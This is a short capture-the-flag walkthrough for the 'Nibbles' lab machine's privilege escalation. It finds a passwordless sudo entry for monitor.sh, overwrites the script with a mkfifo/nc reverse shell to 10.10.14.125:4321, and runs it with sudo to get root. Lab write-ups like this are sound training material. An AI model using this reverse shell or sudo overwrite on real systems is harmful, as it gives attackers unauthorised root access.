Skip to content

Nibbles Privilege Escalation

ℹ️ Informations

Question

Escalate privileges and submit the root.txt flag.

📋 Walkthrough

Let's try to see if We can run something as root using sudo -l 

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Seems we can run that script.\ In nibbler's home, We can see a zip named personal.zip. Let's unzip it 
unzip personal.zip & cd personal
There's a stuff directory containing a monitor.sh script. We can use it to escalate privileges! We can use the same payload used to previous section 
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.125 4321 >/tmp/f" > monitor.sh
$ cat monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.125 4321 >/tmp/f
Listen in nc 
nc -lnvp 4321
Run the script with sudo 
sudo ./monitor.sh

(On the other terminal)

# whoami
root
We can find flag in /root

Answer

[REDACTED]